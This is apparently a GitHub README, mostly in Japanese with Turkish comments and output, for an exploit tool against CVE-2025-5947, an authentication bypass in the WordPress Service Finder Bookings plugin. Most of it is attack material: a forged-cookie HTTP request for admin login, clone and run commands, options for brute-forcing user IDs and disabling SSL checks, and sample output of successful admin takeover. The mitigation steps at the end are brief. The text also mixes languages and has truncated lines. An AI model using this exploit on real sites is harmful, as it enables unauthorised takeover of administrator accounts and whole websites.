
CVE-2025-5947 WordPress Service Finder Bookings ≤ 6.0 エクスプロイト
CVE-2025-5947 WordPress Service Finder Bookings ≤ 6.0 エクスプロイト
WordPress Service Finder Bookings ≤ 6.0 プラグインの認証バイパス脆弱性に対するエクスプロイトツール
Service Finder Bookings WordPress プラグインのバージョン 6.0 以前には、重大な認証バイパス脆弱性が存在します。
認証されていない攻撃者は、以下を実行できます:
service_finder_switch_back() 関数には不十分な Cookie 検証があります:
// Güvenli olmayan kod
if(isset($_COOKIE['original_user_id'])) {
$user_id = $_COOKIE['original_user_id'];
wp_set_current_user($user_id);
// Doğrulama yok!
}
GET /wp-admin/admin-ajax.php?action=service_finder_switch_back HTTP/1.1
Host: target.com
Cookie: original_user_id=1
攻撃の特性:
git clone https://github.com/xxconi/CVE-2025-5947.git
cd CVE-2025-5947
pip install -r requirements.txt
python exploit.py -u http://target.com
# Yardım göster
python exploit.py -h
# Admin (ID=1) olarak giriş dene
python exploit.py -u http://target.com
# Belirli kullanıcı ID'si ile
python exploit.py -u http://target.com -i 5
# Brute force (ID 1-10)
python exploit.py -u http://target.com -b 1-10
# SSL doğrulaması olmadan
python exploit.py -u http://target.com --no-ssl-verify
# Özel timeout ile
python exploit.py -u http://target.com -t 30
python exploit.py -u http://wordpress.local
出力:
============================================================
CVE-2025-5947 Service Finder Bookings Exploit
Authentication Bypass via Cookie Spoofing
============================================================
✅ Service Finder Bookings eklentisi bulundu
🔍 Kullanıcı ID 1 ile giriş denemesi yapılıyor...
📊 HTTP Status: 302
📋 Response Headers:
Location: http://wordpress.local/wp-admin/
Set-Cookie: wordpress_logged_in_abc123=...
✅ BAŞARILI! Admin olarak giriş yapıldı!
📍 Yönlendirme: http://wordpress.local/wp-admin/
python exploit.py -u http://target.com -b 1-20
出力:
🔄 Brute Force Başlıyor (20 kullanıcı)...
✅ Kullanıcı ID 1: BAŞARILI
❌ Kullanıcı ID 2: Başarısız
✅ Kullanıcı ID 3: BAŞARILI
...
✅ Başarılı Kullanıcılar: [1, 3, 5]
python exploit.py -u https://target.com --no-ssl-verify
エクスプロイトが成功した場合、以下の指標が含まれます:
✅ HTTP 301 または 302 レスポンスコード
✅ Location ヘッダーに /wp-admin/ が含まれる
✅ Set-Cookie ヘッダーに wordpress_logged_in_ が含まれる
このツールは以下の目的にのみ使用してください:
使用する必要があります。作者は一切の責任を負いません。
緊急アップデート
# WordPress admin panelinden güncelle
# veya WP-CLI ile
wp plugin update sf-booking
プラグインを無効化
wp plugin deactivate sf-booking
プラグインを削除
wp plugin delete sf-booking
Web Application Firewall (WAF)
Block: /wp-admin/admin-ajax.php?action=service_finder_switch_back
セキュリティチェック
バグの報告や改善の提案を行うには:
git checkout -b feature/improvement)git commit -am 'Add improvement')git push origin feature/improvement)MIT License - 詳細は LICENSE ファイルを参照してください
セキュリティリサーチャー
⭐ 役に立ったと思ったら、スターを付けてください!
| 項目 | 値 |
|---|
| CVE ID | CVE-2025-5947 |
| プラグイン | Service Finder Bookings (sf-booking) |
| 影響を受けるバージョン | ≤ 6.0 |
| 深刻度 | 🔴 CRITICAL |
| CVSS スコア | 9.8 |
| CWE | CWE-639 (Authorization Bypass) |
| EPSS スコア | 0.617 (98.357 パーセンタイル) |
| 公開日 | 2025 |
| パラメータ | 省略形 | 説明 | デフォルト |
|---|
--url | -u | 対象 URL (必須) | - |
--user-id | -i | ユーザー ID | 1 |
--brute-force | -b | ブルートフォース範囲 (1-10) | - |
--no-ssl-verify | - | SSL 検証を無効化 | False |
--timeout | -t | リクエストのタイムアウト (秒) | 10 |